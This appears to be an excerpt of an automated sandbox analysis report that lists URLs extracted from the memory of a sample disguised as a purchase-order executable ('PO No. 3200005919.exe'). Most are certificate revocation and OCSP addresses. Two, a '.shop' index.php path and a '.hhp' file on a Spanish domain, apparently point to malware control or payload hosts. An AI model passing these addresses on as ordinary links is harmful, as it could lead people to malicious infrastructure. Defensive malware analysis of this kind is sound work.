00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.dr, WMIMethod.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                    Source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.dr, WMIMethod.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, WMIMethod.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                    Source: PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, WMIMethod.dll.1.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.dr, WMIMethod.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, WMIMethod.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                    Source: PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, WMIMethod.dll.1.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                    Source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.dr, WMIMethod.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                    Source: PO No. 3200005919.exe, 00000005.00000002.7257083339.000000001D3C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://dbxo2.shop/dbx2/index.php
                    Source: PO No. 3200005919.exe, 00000005.00000002.7238816533.00000000017A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dbxo2.shop/dbx2/index.php?
                    Source: PO No. 3200005919.exe, 00000005.00000002.7238680594.0000000001796000.00000004.00000020.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7238816533.00000000017A9000.00000004.00000020.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7239130262.00000000017D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://montevivo.es/lPkFJXszrxOMoP0.hhp
                    Source: PO No. 3200005919.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, WMIMethod.dll.1.drString found in binary or memory: http://ocsp.digicert.com0H
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, WMIMethod.dll.1.drString found in binary or memory: http://ocsp.digicert.com0I
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.dr, WMIMethod.dll.1.drString found in binary or memory: http://ocsp.digicert.com0O
                    Source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                    Source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                    Source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
